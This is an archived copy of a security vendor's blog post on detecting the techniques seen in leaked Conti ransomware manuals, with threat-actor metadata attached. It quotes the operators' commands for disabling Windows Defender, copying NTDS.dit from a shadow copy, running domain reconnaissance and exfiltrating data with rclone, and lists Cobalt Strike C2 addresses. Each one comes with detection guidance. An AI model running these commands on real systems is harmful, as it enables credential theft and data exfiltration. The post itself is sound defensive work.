{
	"id": "96c0381b-d164-4e33-979d-68dcdb956a47",
	"created_at": "2026-04-06T00:10:21.588214Z",
	"updated_at": "2026-04-10T13:12:56.647427Z",
	"deleted_at": null,
	"sha1_hash": "4daadacc53becf5b64b437e1482154a8f751efac",
	"title": "An insider insights into Conti operations – Part Two",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1628233,
	"plain_text": "An insider insights into Conti operations – Part Two\r\nBy Quentin Bourgue,\u0026nbsp;Erwan Chevalier,\u0026nbsp;Guillaume C.\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2021-08-19 · Archived: 2026-04-05 15:38:10 UTC\r\nTable of contents\r\nLet’s detect Conti’s techniques!\r\nDisable Windows Defender using PowerShell (T1562.001)\r\nRetrieve NTDS file from Volume Shadow Copy (T1003.003)\r\nIdentify domains using Nltest (T1482)\r\nIdentify remote systems using net command (T1018)\r\nExfiltrate data using Rclone (T1567.002)\r\nCobalt Strike (T*)\r\nConclusion\r\nThe first blog post was focusing on Conti’s evolution and the leak’s context and analysis. In this second blog post,\r\nwe will look into how to make simple detection rules to detect the techniques shown in the Conti manuals. The\r\ntechniques are simple for most of them, with no obfuscation and classic techniques being used, hence why simple\r\ndetection rules are possible.\r\nFor that, we picked a few techniques that we will explain, and link them to existing rules to show that open-source\r\ndetection techniques already exist for such a threat and can be used to help all the companies prevent that.\r\nHowever, please note that even though simple rules can detect Conti operations as displayed in the manuals, it\r\ndoes not mean it will detect future Conti intrusions or other ransomware actors. 
The techniques matter and should be explored in depth to build better detection rules.\r\nLet’s detect Conti’s techniques!\r\nDisable Windows Defender using PowerShell (T1562.001)\r\nThe command used by the Conti operators to disable Windows Defender is the following:\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\nThey use PowerShell and the “Set-MpPreference” cmdlet, which configures preferences for Windows Defender scans and updates on the whole system, rather than “Add-MpPreference”, which modifies Windows Defender settings and is often used to exclude a specific path from scanning.\r\nA thing to note here is that the Conti operators seem to disable ONLY “RealTimeMonitoring”, whereas most other actors also disable “BehaviorMonitoring”.\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 1 of 11\r\nAlthough there are many ways to disable Windows Defender, this one is widely used and therefore a good detection opportunity. Indeed, it is used by many other ransomware actors, but also by APT actors such as Lazarus, as shown in the F-Secure blogpost¹ (URL accessed August 19, 2021).\r\nA Sigma rule to detect this is provided with that blogpost and its GitHub repository².\r\nThis is useful because it allows such a threat to be detected with only Event ID 1 from Sysmon or Event ID 4688 from Windows, for example.\r\nIn Sekoia.io we have a similar rule to detect this technique. However, as written in the introduction to this blog post, the command itself is not what matters; what matters is the technique: disabling Windows Defender. Therefore we looked into the TTP in depth to check which techniques can be used to disable Windows Defender and built rules on that.\r\nTo give a few examples, Windows Defender can also be disabled using the “sc” command or directly through registry keys.
Its legitimate executable “MpCmdRun.exe” can also be used to remove all signatures from Windows Defender, which does not disable it but makes it largely useless for detection.\r\nHere is how Windows Defender being disabled using PowerShell is shown on a Sekoia.io alert:\r\nDetection of Windows Defender deactivation in Sekoia.io\r\nRetrieve NTDS file from Volume Shadow Copy (T1003.003)\r\nDumping the “NTDS.dit” file from Active Directory is a very common method to extract the password hashes of all domain members. Various tools or techniques can be used to achieve this. The one performed by Conti operators is based on copying the “NTDS.dit” file from a Volume Shadow Copy.\r\nConti operators are not the only ones to use that technique. MITRE ATT\u0026CK lists software and groups using this technique, named “OS Credential Dumping: NTDS”³. These threat actors include FIN6, Fox Kitten, and Mustang Panda.\r\nThe widely used technique detailed in the Conti manual consists of finding a Shadow Copy on the Active Directory server and then copying the “NTDS.dit” file. If no Shadow Copy exists, the Conti operators create one using the “vssadmin” command. The command lines used by the operators are the following:\r\nwmic /node:\"DC01\" /user:\"DOMAIN\\admin\" /password:\"cleartextpass\" process call create \"cmd /c vssadmin list shadows \u003e\u003e c:\\log.txt\"\r\nOR\r\nwmic /node:\"DC01\" /user:\"DOMAIN\\admin\" /password:\"cleartextpass\" process call create \"cmd /c vssadmin create shadow /for=C: 2\u003e\u00261\"\r\nTHEN\r\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\programdata\r\nThe detection of the NTDS.dit dump using a Volume Shadow Copy can be achieved at different steps.\r\nFirst, monitoring suspicious “vssadmin” execution may reveal the creation, deletion or listing of Shadow Copies.
While creating Shadow Copies is a common way to perform regular backups, listing and deleting Shadow Copies is much rarer.\r\nA detection rule can be built on the Microsoft-Windows-Security-Auditing Event ID 4688 (A new process has been created) by looking for the process name “vssadmin.exe” together with suspicious command line arguments such as “delete shadows”, “list shadows” or “create shadow /for=C:”. Sysmon Event ID 1 (Process creation) can also be used, with the fields “Image” and “CommandLine”.\r\nSecond, detecting activity related to the “NTDS.dit” file is an efficient way to identify attacker behaviour. One solution is to monitor command lines that contain the “copy” command and the “NTDS.dit” file path “\\Windows\\NTDS\\NTDS.dit”. Again, Windows Event ID 4688 and Sysmon Event ID 1 allow this. Sysmon can also detect the creation of this file with Event ID 11 (FileCreate), by checking whether “TargetFilename” matches “*NTDS.dit”, in case the attacker doesn’t rename it.\r\nA Sigma rule⁴ provides elements to detect the technique used by Conti operators.\r\nOther ways to dump the “NTDS.dit” file exist, using built-in Windows tools (esentutl, ntdsutil) or penetration testing tools (Mimikatz, Koadic, CrackMapExec, …). Again, their execution can be detected using Windows and Sysmon events.\r\nWe replayed the commands on a Windows machine supervised by the Sekoia.io XDR. Here are the two alerts that were raised:\r\nDetection of Shadow Copies listing on Sekoia.io\r\nDetection of the copy of NTDS.dit file on Sekoia.io\r\nIdentify domains using Nltest (T1482)\r\nConti operators used the Windows built-in command “nltest.exe” to identify Domain Controllers (DCs) and trust relationships.
As their name says, Domain Controllers are the servers that “control” a Windows domain, so this command is commonly used by attackers as a quick, built-in way to enumerate servers of great interest.\r\nA trust relationship is a link between domains or forests in a Windows environment. When such a link is set up between two domains, for instance, domain A can access resources in domain B. It is more complex than that though, as there can be one-way or two-way trusts, etc. We recommend reading the Microsoft documentation⁵ for more details and this great blogpost⁶ by @harmjoy, which covers many techniques used to abuse domain trusts.\r\nAlthough built-in, the “nltest” command is surprisingly little used for legitimate purposes by users and administrators, which makes it a great detection opportunity! Here are the exact commands used by the Conti operators:\r\nnltest /DOMAIN_TRUSTS\r\nnltest /dclist:\"NameDomain\"\r\nnltest /domain_trusts /all_trusts\r\nThese three commands do the following:\r\nReturns a list of trusted domains.\r\nReturns all Domain Controllers of a specific domain (NameDomain here).\r\nReturns all trusted domains.\r\nAgain, as these commands are commonly used and really simple, a public Sigma rule⁷ already exists and can be used to detect all three commands. This rule works with only Windows Event ID 4688 or Sysmon Event ID 1.\r\nOther techniques can be used to retrieve similar information, such as “dsquery.exe”, which is also a legitimate built-in Windows executable and can be observed in the Sigma rule.
Another quick win is to look at the PowerShell commands that can also be used to retrieve the list of Domain Controllers of a domain, although these are more commonly used legitimately and can lead to some false positives.\r\nHere is how an alert regarding that technique is shown on Sekoia.io:\r\nDetection of domain trusts discovery using the “nltest” command\r\nIdentify remote systems using net command (T1018)\r\nConti operators executed the following commands (Sekoia.io removed explicit information on hostnames and usernames):\r\nnet view \\\\[DC_SERVER] /all 1\u003e\u003ec:\\programdata\\sh.txt\r\nnet view \\\\[HOSTNAME] /ALL\r\nnet view /all /domain\r\nnet view \\\\host /ALL\r\nnet view \\\\172.16.1.40 /ALL\r\nnet user [USERNAME] /dom\r\nnet user [USERNAME] /domain\r\nnet user Администратор /active:yes\r\nnet group \"domain admins\" /domain\r\nnet accounts /dom\r\nThere are several things to note in these commands.\r\nThe first one is that, once, they use the operator “1\u003e\u003e” to redirect command output into a file. Redirecting output to a file on Windows is not that common but can still lead to quite a lot of false positives depending on the estate; however, it is mainly done using only “\u003e” or “\u003e\u003e”, not “1\u003e\u003e”. There is a great quick win here: checking for “1\u003e\u003e” in the command line arguments.\r\nThe second thing is that even though most of the listed commands are very commonly used in a corporate environment, the following one can have a higher detection rate:\r\nnet group \"domain admins\" /domain\r\nIndeed, this command is a bit less common in corporate environments and can therefore be used for detection.
A rule for it is also publicly available in the Sigma repository⁸, and it can be detected with Windows Event ID 4688 or Sysmon Event ID 1 as well. Depending on your estate’s activity, you might be able to remove the time and count conditions of the rule to make it more specific and catch an attacker using this command a single time. Note that this might lead to some false positives, and it should definitely be adapted to your corporate environment.\r\nApart from that one, all the commands are very commonly used in a corporate environment. They are discovery / reconnaissance commands and, in our opinion, should still be detected, but with a low “score” / “urgency”. As shown above with the Sigma rule though, it can be useful to assign a higher score if the commands are executed on the same host multiple times within a few seconds. Seeing only one of these commands should not be a “red flag”, but it is still useful to have a rule for it in case other rules match too.\r\nLet’s take a quick example with only the commands above. There are 10 commands listed. Assuming all 10 are executed (even if that will probably not be the case), the rules we created will match 10 times.\r\nAt SEKOIA.IO we use an urgency “score” that represents the criticality of an alert and whether it should be dealt with right away. We also have a “similarity” system, which tells us how many times a rule has matched on the same host.\r\nTherefore, if several commands are executed on the same host and each one matches the same rule, we will still have a low urgency score but a high “similarity” number.\r\nIf only one command is executed, we will have one alert with one event and 0 similarity, hence we will know that it is most likely a false positive if no other rule matches.
\r\nHowever, when the 10 commands are executed, we will have either:\r\none alert with 10 similarities if the commands are executed on the same host;\r\n10 alerts otherwise.\r\nEither way, this is already a bit suspicious. Following that, we analyse the events and check whether there are other suspicious events on the same host or surrounding those commands. And this is only the discovery step, so many other alerts, such as those shown in this blogpost, will (likely) be raised!\r\nEverything above is here to say one thing: every step of the MITRE ATT\u0026CK matrix is worth detecting. False positives can always be avoided or reduced, and not detecting those techniques (especially the discovery techniques) could considerably delay defenders in spotting the attacker.\r\nDetecting each command here is also quite straightforward, for example by matching “net.exe”/“net1.exe” together with each option, and works with Windows Event ID 4688 and Sysmon Event ID 1 as well.\r\nHere is a simple example that shows an alert on SEKOIA.IO when “net.exe” or “net1.exe” is used to discover shares:\r\nDetection of network share discovery commands on Sekoia.io\r\nExfiltrate data using Rclone (T1567.002)\r\nRclone is a legitimate program for managing files on cloud storage that is often used by ransomware operators performing double extortion. Indeed, it is a simple command-line tool that enables them to exfiltrate data from compromised systems to their own storage. In 2021, Rclone was observed in several ransomware attacks operated by Darkside, Egregor, REvil or Conti operators. This tool is rarely used in company IT environments.
It is therefore relevant to look for traces of its execution.\r\nAccording to the leaked manual and a previous DFIR report⁹, Conti operators use Rclone with a configuration file and without trying to disguise their activity. Indeed, they download the program directly from the official webpage and don’t obfuscate their commands:\r\nrclone.exe config\r\nrclone.exe config show\r\nrclone.exe copy \"FILES\" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12\r\nrclone.exe copy \"FILES\" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3\r\nThe Conti operators seem to use FTP servers and the Mega service to exfiltrate victims’ data. This information is useful for detecting their activity when Rclone is legitimately used in an IT environment, but with cloud storage other than FTP and Mega.\r\nHere are some ways to detect Rclone usage on Windows systems:\r\nA basic way is to monitor process creation events whose process name is “rclone.exe”, using Windows Event ID 4688 or Sysmon Event ID 1. This method is sufficient to detect the operations performed by Conti operators.\r\nIn case attackers masquerade the executable by renaming it, it remains possible to detect its execution with the same Windows or Sysmon events by searching the “CommandLine” value for specific argument sequences. For example, detecting the patterns “copy”, “mega:” and “--” (which corresponds to an additional flag) in the same command line is specific enough to find the execution of a renamed Rclone binary.
Of course, the pattern “mega:” can be replaced by “ftp:”, “pcloud:”, “s3” or any other storage service likely to receive data exfiltrated by an attacker.\r\nIn case attackers masquerade the executable and use an Rclone configuration file instead of indicating the destination endpoint in the command line, it is still possible to detect the arguments specific to Rclone. For example, looking for “--ignore-existing”, “--auto-confirm”, “--multi-thread-streams”, “--transfers” or “--no-check-certificate” in addition to the “copy” argument may reveal Rclone execution.\r\nAgain, Sigma detection rules¹⁰ ¹¹ ¹² detecting Rclone execution are available in the Sigma GitHub repository.\r\nA detection rule based on the three cases described above raised an alert in Sekoia.io XDR when replaying the Conti operators’ commands to exfiltrate data using Rclone.\r\nDetection of Rclone commands on Sekoia.io\r\nCobalt Strike (T*)\r\nCobalt Strike usage is a gold mine for detecting a compromised network and was already covered in a previous blog post¹³.\r\nOn top of that, Cobalt Strike C2 (Command and Control) servers can often be spotted, depending on their configuration, using different sources (online and offline). In the leaks, 4 Cobalt Strike IP addresses were provided: “162.244.80[.]235”, “85.93.88[.]165”, “185.141.63[.]120” and “82.118.21[.]1”.\r\nAlthough after the leak they probably won’t be used, as they are really easy for companies to block and are now integrated into many feeds, what is useful is to spot the C2s BEFORE they are used in operations, and overall before they are made publicly available.\r\nAt SEKOIA we track adversary infrastructure to collect information on C2s using different sources.
As an example, we had the Cobalt Strike C2s provided in the leak before they were leaked (and therefore hopefully before they were used in any operation):\r\nIn that image, “MalleableC2” stands for specific profiles used by the Cobalt Strike team server and “Cobalt Strike” for the default Cobalt Strike configuration. As displayed in the image, one C2 was spotted on July 12th, 2021, almost a month before the first leak. It is therefore quite useful to have this kind of capability on top of classic system and network detections, as it gives another way to detect threats, and companies can usually act easily on IP addresses (\u0026 domain names).\r\nConclusion\r\nThis second blog post focused on detecting the leaked Conti techniques. As stated several times, it shows that detecting ransomware operators’ actions before the ransomware is executed is actually possible, as there are multiple detection opportunities. Indeed, they use commands that are commonly seen among many attackers and they do not seem to obfuscate them. In the end, it is a good opportunity to fill any detection gaps you may have and to review MITRE ATT\u0026CK overall, studying the techniques used by Conti in more depth to detect other actors that might use more complex techniques.\r\nOur analysis leaves us with one question: will Conti operators change their modus operandi following the leaks or not?\r\nSince the techniques used are not really advanced but are efficient, at SEKOIA we think that the leaks will not have much impact on the way Conti operates. As they aim for efficiency and money, they will still target companies carefully and then launch their ransomware as fast as they can.
They probably won’t bother changing their techniques since that costs money; most of the techniques were already known before the leaks from the various incident response reports, and they still work today, so why bother?\r\nExternal references:\r\n[1] https://labs.withsecure.com/publications/catching-lazarus-threat-intelligence-to-real-detection-logic (URL accessed August 19, 2021).\r\nSource: https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/"
	],
	"report_names": [
		"an-insider-insights-into-conti-operations-part-two"
	],
	"threat_actors": [
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2c348851-5036-406b-b2d1-1ca47cfc7523",
			"created_at": "2022-10-25T16:07:24.039861Z",
			"updated_at": "2026-04-10T02:00:04.847961Z",
			"deleted_at": null,
			"main_name": "Parisite",
			"aliases": [
				"Cobalt Foxglove",
				"Fox Kitten",
				"G0117",
				"Lemon Sandstorm",
				"Parisite",
				"Pioneer Kitten",
				"Rubidium",
				"UNC757"
			],
			"source_name": "ETDA:Parisite",
			"tools": [
				"Cobalt",
				"FRP",
				"Fast Reverse Proxy",
				"Invoke the Hash",
				"JuicyPotato",
				"Ngrok",
				"POWSSHNET",
				"Pay2Key",
				"Plink",
				"Port.exe",
				"PuTTY Link",
				"SSHMinion",
				"STSRCheck",
				"Serveo"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6e3ba400-aee3-4ef3-8fbc-ec07fdbee46c",
			"created_at": "2025-08-07T02:03:24.731268Z",
			"updated_at": "2026-04-10T02:00:03.651425Z",
			"deleted_at": null,
			"main_name": "COBALT FOXGLOVE",
			"aliases": [
				"Fox Kitten ",
				"Lemon Sandstorm ",
				"Parisite ",
				"Pioneer Kitten ",
				"RUBIDIUM ",
				"UNC757 "
			],
			"source_name": "Secureworks:COBALT FOXGLOVE",
			"tools": [
				"Chisel",
				"FRP (Fast Reverse Proxy)",
				"Mimikatz",
				"Ngrok",
				"POWSSHNET",
				"STSRCheck",
				"Servo",
				"n3tw0rm ransomware",
				"pay2key ransomware"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "871acc40-6cbf-4c81-8b40-7f783616afbc",
			"created_at": "2023-01-06T13:46:39.156237Z",
			"updated_at": "2026-04-10T02:00:03.232876Z",
			"deleted_at": null,
			"main_name": "Fox Kitten",
			"aliases": [
				"UNC757",
				"Lemon Sandstorm",
				"RUBIDIUM",
				"PIONEER KITTEN",
				"PARISITE"
			],
			"source_name": "MISPGALAXY:Fox Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d070e12b-e1ce-4d8d-b5e3-bc71960cc0cb",
			"created_at": "2022-10-25T15:50:23.676504Z",
			"updated_at": "2026-04-10T02:00:05.260839Z",
			"deleted_at": null,
			"main_name": "Fox Kitten",
			"aliases": [
				"Fox Kitten",
				"UNC757",
				"Parisite",
				"Pioneer Kitten",
				"RUBIDIUM",
				"Lemon Sandstorm"
			],
			"source_name": "MITRE:Fox Kitten",
			"tools": [
				"China Chopper",
				"Pay2Key",
				"ngrok",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434221,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4daadacc53becf5b64b437e1482154a8f751efac.pdf",
		"text": "https://archive.orkl.eu/4daadacc53becf5b64b437e1482154a8f751efac.txt",
		"img": "https://archive.orkl.eu/4daadacc53becf5b64b437e1482154a8f751efac.jpg"
	}
}